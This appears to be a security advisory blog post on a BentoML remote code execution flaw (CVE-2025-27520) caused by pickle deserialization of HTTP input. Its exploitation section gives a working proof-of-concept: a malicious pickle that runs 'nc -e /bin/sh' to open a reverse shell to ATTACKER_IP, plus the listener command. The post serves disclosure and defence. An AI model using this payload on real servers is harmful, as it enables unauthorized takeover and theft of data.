Press ESC to close

Critical RCE Vulnerability in BentoML (CVE-2025-27520): What You Need to Know

What is BentoML?

BentoML is a popular Python framework designed for building and deploying AI-powered online services. It enables developers to package machine learning models into production-ready APIs with minimal effort, supporting high-performance serving and scalable deployment.

What is This Vulnerability About?

A critical security vulnerability (CVE-2025-27520, CVSS 9.8) has been discovered in BentoML versions 1.3.8 through 1.4.2. This remote code execution (RCE) flaw allows unauthenticated attackers to execute arbitrary code on servers running vulnerable BentoML instances.

Discovered by GitHub user c2an1 and further analyzed by Checkmarx researchers, this vulnerability is particularly dangerous because:

It requires no authentication

It can lead to complete server compromise

It’s a regression of CVE-2024-2912 (previously fixed in v1.2.5 but reintroduced in v1.3.8)

Technical Analysis

The vulnerability resides in the deserialize_value() function within serde.py, which improperly handles serialized data from HTTP requests:

def deserialize_value(self, payload: Payload) -> t.Any:
    if "buffer-lengths" not in payload.metadata:
        return pickle.loads(b"".join(payload.data))

The critical issues are:

1. Insecure Deserialization: The function uses Python’s pickle module to deserialize untrusted input without proper validation

2. Direct HTTP Input: The payload comes directly from HTTP requests that attackers can manipulate

3. Pickle Risks: Python’s pickle can execute arbitrary code during deserialization

Exploitation Method

Attackers can exploit this by crafting malicious pickle payloads that execute system commands when deserialized. Here’s a proof-of-concept:

1. Setup vulnerable environment (SERVER_IP):

pip install bentoml==1.4.2

2. Create service.py:

from __future__ import annotations
import bentoml

@bentoml.service(resources={"cpu": "4"})
class Summarization:
    @bentoml.api(batchable=True)
    def summarize(self, texts: list[str]) -> list[str]:
        return ["Summarized: " + text for text in texts]

3. Start service:

bentoml serve

4. Attack from another machine (ATTACKER_IP):

import pickle
import os
import requests

class Exploit:
    def __reduce__(self):
        return (os.system, ('nc -e /bin/sh ATTACKER_IP  1234',))
        
payload = pickle.dumps(Exploit())
requests.post(
    "http://SERVER_IP:3000/summarize",
    data=payload,
    headers={'Content-Type': 'application/vnd.bentoml+pickle'}
) 

5. Receive reverse shell:

nc -lvvp 1234

Impact

Successful exploitation can lead to:

  • Complete server takeover
  • Data theft (including sensitive AI models)
  • Installation of persistent backdoors
  • Lateral movement in the network

Conclusion

CVE-2025-27520 represents a severe threat to organizations using vulnerable BentoML versions. The vulnerability’s ease of exploitation and high impact potential make it critical to address immediately. This case also highlights the importance of:

  • Maintaining consistent security fixes across versions
  • Properly vetting serialization/deserialization processes
  • Implementing defense-in-depth for AI infrastructure

Leave a Reply

Your email address will not be published. Required fields are marked *